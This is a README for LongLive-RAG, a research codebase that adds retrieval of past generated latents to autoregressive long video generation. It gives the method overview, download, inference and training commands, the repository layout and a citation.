Qixin Hu · Shuai Yang · Wei Huang · Song Han · Yukang Chen
LongLive-RAG turns long video generation into a retrieval problem. Instead of attending only to the most recent sliding window, an autoregressive (AR) video generator looks back over the video it has already generated and pulls in the most relevant past latents as extra context. This cuts error accumulation, identity drift, and background flicker over long horizons, without retraining the base generator.
- [2026.06] We release the LongLive-RAG paper and code!
More results and video comparisons on the project page.
Long-horizon comparisons. The native sliding-window baseline (left) accumulates errors and drifts over time, while adding LongLive-RAG (right) preserves subject identity and visual quality.
| Native (baseline) | Native + LongLive-RAG (Ours) |
|---|---|
| native_1.mp4 | native_ours_1.mp4 |
| native_2.mp4 | native_ours_2.mp4 |
- First of its kind. Among open-ended AR long video generation methods, the first to formulate self-generated latent history as content-addressable retrieval memory.
- Plug-and-play. Works across Causal-Forcing, Self-Forcing, and LongLive with the base generator frozen.
- Searchable history. Retrieves the most relevant past latents as extra context for each new block.
- Consistent wins. Best average VBench-Long rank across lengths and backbones.
At block t, a standard AR model attends to a sliding-window context. LongLive-RAG inserts retrieved historical entries M_t between the sink and local windows:
Sliding window: A_sw = [ C_sink ‖ C_loc ]
LongLive-RAG: A_rag = [ C_sink ‖ M_t ‖ C_loc ]
Here ‖ denotes concatenation of context segments.
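The two context layouts can be illustrated with a minimal sketch. It uses plain Python lists of block labels in place of latent tensors, and the function name `assemble_context` is hypothetical (it is not taken from the repository). The sketch only shows the ordering: sink entries first, then retrieved entries, then the local window.

```python
from typing import List, Sequence


def assemble_context(
    sink: Sequence[str],
    retrieved: Sequence[str],
    local: Sequence[str],
) -> List[str]:
    """Concatenate context segments in the order sink, retrieved, local.

    With an empty `retrieved` segment this reduces to the plain
    sliding-window context.
    """
    return list(sink) + list(retrieved) + list(local)


# Toy labels standing in for latent blocks (illustrative only).
sink = ["b0"]
local = ["b7", "b8", "b9"]
retrieved = ["b2", "b4"]

a_sw = assemble_context(sink, [], local)          # sliding-window context
a_rag = assemble_context(sink, retrieved, local)  # context with retrieved entries
print(a_sw)
print(a_rag)
```

Because the retrieved entries are just an extra segment in the context, the base generator's weights do not need to change, which is consistent with the frozen-generator setup described here.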
| Stage | What happens |
|---|---|
| 1. Indexing | Encode each completed latent block into a compact embedding and store it. |
| 2. Retrieval | Match the current block against past embeddings and pull in the top-K as extra context. |
| 3. Embedding training | Train the encoder offline on self-generated latents, with the base generator frozen. |
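Stages 1 and 2 can be sketched as a small in-memory index. This is a toy illustration under stated assumptions: the class `LatentMemory` is hypothetical, the embeddings are hand-written vectors rather than outputs of the retrieval encoder, and cosine similarity is assumed as the matching score (the text above does not state which score is used).

```python
import math
from typing import List, Sequence, Tuple


def cosine(a: Sequence[float], b: Sequence[float]) -> float:
    """Cosine similarity between two vectors; 0.0 if either has zero norm."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    return dot / (norm_a * norm_b) if norm_a > 0 and norm_b > 0 else 0.0


class LatentMemory:
    """Hypothetical store of (block id, embedding) pairs."""

    def __init__(self) -> None:
        self.entries: List[Tuple[int, List[float]]] = []

    def index(self, block_id: int, embedding: Sequence[float]) -> None:
        # Stage 1: store the compact embedding of a completed block.
        self.entries.append((block_id, list(embedding)))

    def retrieve(self, query: Sequence[float], k: int) -> List[int]:
        # Stage 2: rank stored blocks by similarity and keep the top-K ids.
        ranked = sorted(
            self.entries, key=lambda e: cosine(query, e[1]), reverse=True
        )
        return [block_id for block_id, _ in ranked[:k]]


memory = LatentMemory()
memory.index(0, [1.0, 0.0])
memory.index(1, [0.0, 1.0])
memory.index(2, [0.9, 0.1])

top = memory.retrieve([1.0, 0.05], k=2)
print(top)
```

A linear scan is enough for a sketch; how the actual implementation stores and searches embeddings is not specified here.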
LongLive-RAG shares its environment with LongLive. Just follow the upstream LongLive installation guide.
1. Download everything in two commands. All LongLive-RAG assets (AR backbones, retrieval AE, prompt files, and the toy latent set) live in a single Hugging Face repo; the base WAN VAE comes from Wan:
# Base WAN VAE: LongLive-RAG operates in its latent space
hf download Wan-AI/Wan2.1-T2V-1.3B --local-dir wan_models/Wan2.1-T2V-1.3B
# All LongLive-RAG assets: restores checkpoints/ and toydatasets/ in place
hf download qixinhu11/LongLive-RAG --local-dir . --include "checkpoints/*" "toydatasets/*"
Older setups can swap `hf download` for `huggingface-cli download` (same arguments).
The second command lays out:
checkpoints/
├── causal_forcing.pt # Causal-Forcing AR backbone
├── self_forcing.pt # Self-Forcing AR backbone
├── longlive_base.pt # LongLive AR backbone
├── longlive_lora.pt # LongLive LoRA (paired with longlive_base.pt)
├── ae_latent_mem.pt # Retrieval autoencoder (default for inference)
├── moviegenbench_128_refined.txt # 128 MovieGenBench prompts
└── vidprom_filtered_extended.txt # Self-Forcing prompt pool (for generate_latent.py)
toydatasets/
└── latent_0000xx.pt # tiny example latent set for the training demo
To train your own retrieval AE instead of using ae_latent_mem.pt, see Training.
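After downloading, it can help to confirm that the expected files are in place before launching inference. The following is a minimal sketch: the helper `missing_assets` is hypothetical (not part of the repository), the file names are copied from the layout listed above, and the toy dataset is assumed to match the pattern `latent_*.pt`.

```python
from pathlib import Path
from typing import List

# File names taken from the checkpoints/ layout listed above.
EXPECTED_CHECKPOINT_FILES = [
    "causal_forcing.pt",
    "self_forcing.pt",
    "longlive_base.pt",
    "longlive_lora.pt",
    "ae_latent_mem.pt",
    "moviegenbench_128_refined.txt",
    "vidprom_filtered_extended.txt",
]


def missing_assets(root: str = ".") -> List[str]:
    """Return the relative paths of expected assets not found under `root`."""
    base = Path(root)
    missing = [
        f"checkpoints/{name}"
        for name in EXPECTED_CHECKPOINT_FILES
        if not (base / "checkpoints" / name).is_file()
    ]
    toy_dir = base / "toydatasets"
    # Assumption: toy latents follow the latent_*.pt naming shown above.
    if not toy_dir.is_dir() or not any(toy_dir.glob("latent_*.pt")):
        missing.append("toydatasets/latent_*.pt")
    return missing


if __name__ == "__main__":
    for path in missing_assets("."):
        print("missing:", path)
```

Run from the repository root, the script prints nothing when every listed asset is present.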
3. Run. The repo ships a 3 × 2 grid (three backbones × two context-assembly methods) in configs/:
| Backbone \ Method | native (sliding-window) | latentmem (LongLive-RAG, ours) |
|---|---|---|
| causal_forcing | causal_forcing_native.yaml | causal_forcing_latentmem.yaml |
| self_forcing | self_forcing_native.yaml | self_forcing_latentmem.yaml |
| longlive | longlive_native.yaml | longlive_latentmem.yaml |
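The file names in the grid follow a `<backbone>_<method>.yaml` pattern. The sketch below mirrors that naming in Python; the helper `config_path` is hypothetical, and how `inference.sh` actually resolves its config file is not shown in this README, so treat this as an illustration of the naming only.

```python
from pathlib import Path

BACKBONES = ("causal_forcing", "self_forcing", "longlive")
METHODS = ("native", "latentmem")


def config_path(backbone: str, method: str, config_dir: str = "configs") -> Path:
    """Build the YAML path for one cell of the backbone x method grid."""
    if backbone not in BACKBONES:
        raise ValueError(f"unknown backbone: {backbone!r}")
    if method not in METHODS:
        raise ValueError(f"unknown method: {method!r}")
    return Path(config_dir) / f"{backbone}_{method}.yaml"


# Enumerate all six configurations in the grid.
grid = [config_path(b, m) for b in BACKBONES for m in METHODS]
for path in grid:
    print(path.as_posix())
```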
# Main result: Causal-Forcing backbone + LongLive-RAG retrieval
bash inference.sh causal_forcing latentmem
# Baselines: native sliding-window
bash inference.sh causal_forcing native
# GPU / port overrides
GPU=4 PORT=29510 bash inference.sh causal_forcing latentmem

The base generator stays frozen; the only trainable component is the retrieval encoder (a small latent autoencoder). Training has two steps:
Step 1: Build a latent corpus. Run a frozen generator over a prompt pool to collect the clean latent blocks it produces; these become the training samples. The launcher shards generation across multiple GPUs.
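One common way to shard a prompt pool across GPUs is a round-robin split by rank. The sketch below assumes that scheme purely for illustration; the function `shard_prompts` is hypothetical, and the launcher's actual sharding strategy is not described here.

```python
from typing import List, Sequence


def shard_prompts(prompts: Sequence[str], rank: int, world_size: int) -> List[str]:
    """Return the prompts assigned to `rank` under a round-robin split."""
    if world_size < 1 or not 0 <= rank < world_size:
        raise ValueError("rank must satisfy 0 <= rank < world_size")
    # Worker `rank` takes every world_size-th prompt, starting at index `rank`.
    return list(prompts[rank::world_size])


prompts = [f"prompt {i}" for i in range(7)]
shards = [shard_prompts(prompts, rank, 3) for rank in range(3)]
for rank, shard in enumerate(shards):
    print(rank, shard)
```

Each prompt lands in exactly one shard, so the workers together cover the pool without duplicates.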
bash generate_latent.sh

Step 2: Train the retrieval autoencoder. Fit the encoder on the collected latents with a reconstruction loss plus the Window Temporal Delta and trajectory-smoothing terms. Default hyperparameters live in ae/configs/.
bash train_ae_delta.sh

Retraining the base AR backbones is out of scope; backbone checkpoints are consumed as-is. See upstream LongLive / Self-Forcing to train one from scratch.
├── ae/ # Retrieval autoencoder (model, configs, training)
├── checkpoints/ # AR backbones, AE checkpoint, prompt .txt files (gitignored)
├── configs/ # Inference YAMLs (3 backbones × 2 methods) + generate_latent
├── datasets/ # AE training latents (output of generate_latent.sh, gitignored)
├── toydatasets/ # Tiny example latent set for the training demo (from HF, gitignored)
├── pipeline/ # Causal inference pipeline (drives all backbones)
├── utils/ # Dataset, memory, scheduler, lora, wan-wrapper utilities
├── wan/, wan_models/ # WAN VAE backbone (T2V-1.3B)
├── inference.py # Inference entry point
├── inference.sh # Launcher: bash inference.sh <backbone> <method>
├── generate_latent.py / .sh # Latent corpus generation (multi-GPU sharded)
└── train_ae_delta.sh # Retrieval AE launcher
Paper: arXiv:2606.02553
@article{longliverag2026,
title = {LongLive-RAG: A General Retrieval-Augmented Framework for Long Video Generation},
author = {Hu, Qixin and Yang, Shuai and Huang, Wei and Han, Song and Chen, Yukang},
journal = {arXiv preprint arXiv:2606.02553},
archivePrefix = {arXiv},
eprint = {2606.02553},
year = {2026}
}

LongLive-RAG builds on the codebases and ideas of:
- LongLive: the AR long-video framework this codebase forks from.
- Self-Forcing: causal AR training recipe and prompt pool.
- Causal-Forcing: one of the AR backbones evaluated in this work.
- Wan: the base video generation model and VAE latent space.
Released under the Apache 2.0 license.
